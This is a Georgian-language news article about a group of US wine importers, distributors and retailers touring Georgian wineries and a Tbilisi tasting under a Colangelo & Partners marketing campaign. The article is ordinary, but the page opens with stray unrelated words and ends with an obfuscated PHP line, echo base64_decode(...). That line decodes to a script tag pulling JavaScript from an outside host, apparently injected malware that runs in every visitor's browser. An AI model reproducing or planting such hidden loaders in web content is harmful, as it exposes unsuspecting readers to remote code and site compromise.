global distribution
გარე ავეჯი

14 კაციანი პროფესიონალების ჯგუფის შემადგენლობაში შედიოდნენ „Colangelo & Partners“-ის ქართული ღვინის პოპულარიზაციის კამპანიის მენეჯერი მერიონ ჰელუი და ამერიკის ღვინით ვაჭრობის სექტორის წარმომადგენლები. 

ტურის ფარგლებში, ამერიკელი სტუმრები ქართული ღვინის მწარმოებელ კომპანიებს კახეთში ესტუმრნენ, სადაც  ქართული ღვინის დაყენების ტექნოლოგიას გაეცნენ,  ადგილზე დააგემოვნეს როგორც კლასიკური, ასევე ტრადიციული მეთოდით დამზადებული ქართული ღვინოები. ქართული ღვინის მასტერკლასი და დეგუსტაცია გაიმართა თბილისშიც, სადაც სტუმრებს შესაძლებლობა ჰქონდათ, გასცნობოდნენ ქართული ღვინის მწარმოებელი 16 კომპანიის ღვინოებს.

„საქარველოში იმყოფება ჯგუფი აშშ-დან - ტექსასიდან, კალიფორნიიდან, ნიუ ჯერსიდან, ნიუ იორკიდან და ფლორიდიდან. იმპორტიორები ჩამოსულები არიან ქართული ღვინოების შესაძენად; დისტრიბუტორები, რომლებიც მჭიდროდ თანამშრომლობენ იმპორტიორებთანღვინოების სხვადასხვა ბაზარზე გასავრცელებლად; არიან საცალო სავაჭრო ობიექტების მფლობელებიც; მთავარი იდეა სტრატეგიის, რომელსაც ვახორციელებთ ღვინის ეროვნულ სააგენტოსთან მჭიდრო თანამშრომლობით, არის ის, რომ წარმოვაჩინოთ საქართველოს უნიკალური ღირებულებები და ამ ადამიანებისგან შევქმნათ ქართველი ღვინის მუდმივი ელჩები, რაც ხელს შეუწყობს ქართული ღვინის გაყიდვების ზრდას ამერიკის შეერთებულ შტატებში“, - განაცხადა მერიონ ჰელუიმ.

აღსანიშნავია, რომ აშშ წარმოადგენს ქართული ღვინის სტრატეგიულ ბაზარს, სადაც, ღვინის ეროვნული სააგენტოს ფინანსური და ორგანიზაციული მხარდაჭერით, აქტიური მარკეტინგული კამპანია ხორციელდება. 

ღვინის ეროვნულ სააგენტოსთან თანამშრომლობის ფარგლებში, „Colangelo & Partners“ აშშ-ში ქართული ღვინის მარკეტინგულ კამპანიას 2022 წლიდან ახორციელებს. „Colangelo & Partners“ ერთ-ერთი უმსხვილესი მარკეტინგული კომპანიაა, რომელიც  ამერიკის ბაზარზე 15 წელზე მეტია ოპერირებს.

84
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");